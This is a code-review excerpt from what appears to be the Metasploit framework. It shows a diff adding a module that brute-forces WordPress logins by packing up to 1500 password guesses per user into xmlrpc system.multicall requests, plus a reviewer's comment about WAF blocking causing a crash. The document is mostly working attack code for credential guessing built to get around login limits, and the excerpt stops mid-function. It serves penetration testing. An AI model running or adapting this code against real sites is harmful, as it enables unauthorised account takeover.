modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb

```diff
@@ -0,0 +1,178 @@
+                                      File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
+          OptPath.new('WPPASS_FILE', [true, 'File containing passwords, one per line',
+                                      File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]),
+          OptInt.new('BLOCKEDWAIT', [true, 'Time(minutes) to wait if got blocked', 6])
+        ], self.class)
+  end
+
+  def usernames
+    File.readlines(datastore['WPUSER_FILE']).map {|user| user.chomp}
+  end
+
+  def passwords
+    File.readlines(datastore['WPPASS_FILE']).map {|pass| pass.chomp}
+  end
+
+  #
+  # XML Factory
+  #
+  def generate_xml(user)
+
+    vprint_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
+    xml_payloads = []                          # Container for all generated XMLs
+    # Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
+    passwords.each_slice(1500) do |pass_group|
+
+      document = Nokogiri::XML::Builder.new do |xml|
+        xml.methodCall {
+          xml.methodName("system.multicall")
+          xml.params {
+          xml.param {
+          xml.value {
+          xml.array {
+          xml.data {
+
+        pass_group.each  do |pass|
+          xml.value {
+          xml.struct {
+          xml.member {
+          xml.name("methodName")
+          xml.value { xml.string("wp.getUsersBlogs") }}
+            xml.member {
+            xml.name("params")
+            xml.value {
+            xml.array {
+            xml.data {
+            xml.value {
+            xml.array {
+              xml.data {
+                xml.value { xml.string(user) }
+                xml.value { xml.string(pass) }
+          }}}}}}}}}
+        end
+
+          }}}}}}
+      end
+
+      xml_payloads << document.to_xml
+    end
+
+    vprint_status('Generating XMLs just done.')
+    xml_payloads
+  end
+
+  #
+  # Check target status
+  #
+  def check_wpstatus
+    print_status("Checking #{peer} status!")
+
+    if !wordpress_and_online?
+      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running Wordpress or you got blocked! (Do Manual Check)")
+      nil
+    elsif !wordpress_xmlrpc_enabled?
+      print_error("#{rhost}:#{rport}#{wordpress_url_xmlrpc} does not enable XMLRPC")
+      nil
+    else
+      print_status("Target #{peer} is running Wordpress")
+      true
+    end
+
+  end
+
+  #
+  # Connection Setup
+  #
+  def connecting(xml)
+    uri = target_uri.path
+    opts =
+      {
+        'method'  => 'POST',
+        'uri'     => normalize_uri(uri, wordpress_url_xmlrpc),
+        'data'    => xml,
+        'ctype'   =>'text/xml'
+      }
+    client = Rex::Proto::Http::Client.new(rhost)
+    client.connect
+    request  = client.request_cgi(opts)
+    response = client.send_recv(request)
+
+    if response.code != 200
```

Comment:
It might happen that specific signatures in WAF are configured to block particular requests (e.g. xml body with a large set of username/passwords). In that case check_wpstatus will pass but when bruteforce is started, it will be blocked. In such a case, the above code will trigger a stacktrace.